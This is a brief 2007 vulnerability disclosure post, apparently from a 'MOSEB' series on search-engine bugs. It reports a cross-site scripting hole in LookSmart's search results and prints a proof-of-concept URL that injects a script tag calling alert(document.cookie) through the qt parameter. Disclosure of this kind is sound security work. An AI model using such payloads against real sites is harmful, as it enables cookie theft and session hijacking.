MOSEB-24: Vulnerability at search.looksmart.com
22:42 24.06.2007Next participant of the project is LookSmart search engine. It is one of the popular search engines.
The vulnerability are at LookSmart (search.looksmart.com) in search results. This Cross-Site Scripting hole I found 23.05.2007.
XSS:
The vulnerability is in qt parameter:
http://search.looksmart.com/p/search?qt=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Moral: smart looking search engines can be dangerous.